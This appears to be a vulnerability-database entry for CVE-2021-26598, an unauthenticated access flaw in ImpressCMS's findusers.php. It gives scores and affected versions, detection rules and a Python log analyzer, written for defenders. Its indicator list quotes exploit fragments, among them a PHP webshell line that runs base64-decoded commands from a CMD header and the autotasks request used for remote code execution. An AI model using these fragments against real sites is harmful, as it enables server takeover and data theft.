CVE-2021-26598
published 2022-03-28


Priority: P3 (45) · Severity: medium, CVSS 3.1 base score 5.3
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Exploit: available
EPSS: 10.81% (95.3rd percentile)
ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).

Affected (2 ranges)

Vendor      Product     Version range   Fixed in
impresscms  impresscms  < 1.4.3         1.4.3
impresscms  impresscms  >= 0 < 1.4.3    1.4.3

Detection & IOCs (extracted from sources)

path:     /include/findusers.php
url:      /misc.php?action=showpopups&type=friend
url:      /include/findusers.php?token={{token}}
command:  curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); ... $params = "user_submit=1&token={$token[1]}&groups[]=%s";
command:  if (isset($_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode($_SERVER[HTTP_CMD])); die; }
path:     /modules/system/admin.php
command:  fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks
  • Detect unauthenticated GET requests to /include/findusers.php with a token parameter — this endpoint should not be accessible without authentication and is the core of CVE-2021-26598.
  • Alert on responses from /include/findusers.php containing all three fields: 'last_login', 'user_regdate', and 'uname' — this indicates successful unauthorized user data enumeration.
  • Monitor for the two-step exploit sequence: first a GET to /misc.php?action=showpopups&type=friend to harvest a TOKEN_REQUEST value, immediately followed by a request to /include/findusers.php using that token — this is the canonical exploitation pattern.
  • Detect regex pattern matching TOKEN_REQUEST extraction from HTTP responses: `REQUEST' value='(.*?)'` or `REQUEST" value="(.*?)"` — used by attackers to automate token harvesting.
  • Alert on POST requests to /modules/system/admin.php with body parameters containing 'fct=autotasks' and 'op=addautotasks' — this is the RCE escalation step chained after CVE-2021-26598 exploitation.
  • Detect HTTP requests to the ImpressCMS root URL containing a custom 'CMD' header with a base64-encoded value — this is the webshell command execution mechanism planted via the autotasks RCE chain.
  • Flag POST requests to /include/findusers.php with parameters 'user_submit=1' and 'groups[]' containing SQL injection payloads (e.g., SLEEP, ORD, SUBSTR, INSERT INTO) — indicative of chained SQLi exploitation (CVE-2021-26599).
  • The security token required to exploit /include/findusers.php is legitimately obtainable by unauthenticated users via /misc.php?action=showpopups&type=friend — token presence alone does not indicate authorization. Detection must focus on the unauthenticated context of the request, not token validity.
  • The Nuclei template uses a two-request chain with an internal extractor; single-request detections against /include/findusers.php without the preceding token-harvest step may produce false negatives if the token is required to be valid.
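The detection notes above can be turned into a small log analyzer. This is an added example, not code from the page or from ImpressCMS: it reads constructed access-log lines (a simplified format with the Cookie header appended as the last quoted field), flags unauthenticated token requests to /include/findusers.php, correlates them with a preceding token harvest from /misc.php?action=showpopups&type=friend, and marks POSTs to /modules/system/admin.php for body inspection. Treating a PHPSESSID cookie as "authenticated" and the 60-second correlation window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (not from the page). Format: ip - - [ts] "METHOD target proto" status bytes "cookie"
LOG = """\
203.0.113.5 - - [28/Mar/2022:10:00:01 +0000] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 200 1433 "-"
203.0.113.5 - - [28/Mar/2022:10:00:02 +0000] "GET /include/findusers.php?token=abc123 HTTP/1.1" 200 5120 "-"
203.0.113.5 - - [28/Mar/2022:10:00:09 +0000] "POST /modules/system/admin.php HTTP/1.1" 302 0 "PHPSESSID=deadbeef"
198.51.100.7 - - [28/Mar/2022:10:05:00 +0000] "GET /include/findusers.php?token=xyz HTTP/1.1" 200 900 "PHPSESSID=cafebabe"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" \d+ \d+ "(?P<cookie>[^"]*)"$'
)
HARVEST_WINDOW = 60  # assumed max seconds between token harvest and its use

def parse(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    u = urlsplit(d["target"])
    d["path"], d["query"] = u.path, parse_qs(u.query)
    d["authenticated"] = "PHPSESSID=" in d["cookie"]  # assumption: session cookie = logged in
    return d

def analyze(log_text):
    """Return (ip, rule) findings for the patterns listed in the detection notes."""
    findings = []
    last_harvest = {}  # ip -> time of last /misc.php?action=showpopups&type=friend
    for line in log_text.splitlines():
        r = parse(line)
        if not r:
            continue
        ip, q = r["ip"], r["query"]
        if r["path"] == "/misc.php" and q.get("action") == ["showpopups"] and q.get("type") == ["friend"]:
            last_harvest[ip] = r["ts"]
        elif r["path"] == "/include/findusers.php" and "token" in q:
            if not r["authenticated"]:
                findings.append((ip, "unauthenticated findusers.php access"))
            t = last_harvest.get(ip)
            if t and (r["ts"] - t).total_seconds() <= HARVEST_WINDOW:
                findings.append((ip, "token-harvest chain"))
        elif r["path"] == "/modules/system/admin.php" and r["method"] == "POST":
            # Access logs lack the body; inspect it (fct=autotasks, op=addautotasks) in a WAF/request log.
            findings.append((ip, "admin.php POST, inspect body for autotasks"))
    return findings
```

Run `analyze(LOG)`: the first client is flagged on all three rules, while the second client's authenticated, un-chained token request produces no finding.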

CVSS provenance

nvd  v3.1  5.3  MEDIUM  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvd  v2.0  5.0  MEDIUM  AV:N/AC:L/Au:N/C:P/I:N/A:N